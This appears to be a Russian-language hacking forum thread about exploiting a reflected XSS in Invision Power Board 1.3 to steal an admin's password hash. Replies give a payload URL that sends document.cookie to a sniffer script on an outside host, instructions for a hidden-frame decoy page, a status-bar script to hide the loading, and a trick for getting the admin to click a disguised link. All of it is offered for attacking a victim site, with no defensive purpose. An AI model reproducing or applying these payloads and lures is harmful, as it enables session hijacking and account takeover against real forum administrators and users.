PDA

Просмотр полной версии : Вопрос про использование xss в Invision Power Board 1.3(U) Final

badboy
27.07.2005, 03:40
Кароче есть сайт http://victim.com/
На нём расположен форум Invision Power Board 1.3(U) Final
Нашёл XSS:http://victim.com/?c='><script>alert(document.cookie)</script><plaintext>

Пожалуйста объясните как я могу заполучить хэш админа.
Если надо вставить код со снифером,то пожалуйста напишите какойи куда вставлять...
WizART
28.07.2005, 23:25
Что-то сайт какой-то странный, рисуночек такой "Go Away!"
censored!
29.07.2005, 01:12
WizART - так просто, типа, обозначают сайт жертву. Victim - жертва. Типа тоже самое: www.жертва.com
...
Это пассивная XSS. Поэтому надо лепить липовую (фэйковую) страницу построенную на фреймах (или окно будет новое открываться) и там уже будет ссылка на эту XSS.
censored!
29.07.2005, 13:19
Фэйковый - липовый
Делай сайт на фреймах - левый нулевой, правый 100% (или просто iframe используй с шириной/высотой 0) тот который 100% будет типа липы. Можешь туда забабахать какое-нить изображение. В фрамесете путь до левого будет примерно такой:
http://victim.com/?c='><script>img = new Image(); img.src = 'http://путь_до_снифера.ru/snifer.php?'+document.cookie;</script>
+ в самом фрамесете подстра***ся и влепи код (но работать будет тока в ИЕ)
<script>
{
window.status="Готово!";
}
</script>
Чтобы большинство не видело что идет загрузка с другого сайта.
...
Можешь еще открыть новое Попап окно без статуса, прокрутки и т.п. и там какую-нить липовую рекламу поместить, но у некоторых может стоять резалка (или файервол) на открытие новых окон и обрубиться.
Grrl
30.07.2005, 07:45
в IPB 1.3 проще хэш сплойтом утянуть чем с xss париться.
Papercut
02.01.2007, 21:00
Grrl, ну не скажи... с некоторых 1.3 Final и"Русского модифицированного"
мне сплоиты не вытягивали хэши
aka PSIH
02.01.2007, 21:04
Grrl, ну не скажи... с некоторых 1.3 Final и"Русского модифицированного"
мне сплоиты не вытягивали хэши
Дак тебе не кто и негарантировал что сплойты на всех форумах работать будут...;)
Ksander
02.01.2007, 21:14
Вы от куда попадали ? тутанхамоны наши =)
Diablo
02.01.2007, 21:46
хы, сказать так: Смотри какую я тему намутил и ссылку (http://victim.com/?c='><script>img = new Image(); img.src = 'http://путь_до_снифера.ru/snifer.php?'+document.cookie;</script>). название ссылки - путь до реальной темы на форуме (для реальности), а адрес ссылки - xss :D. Не пинайте сильно :). Если админ лох - прокатит :)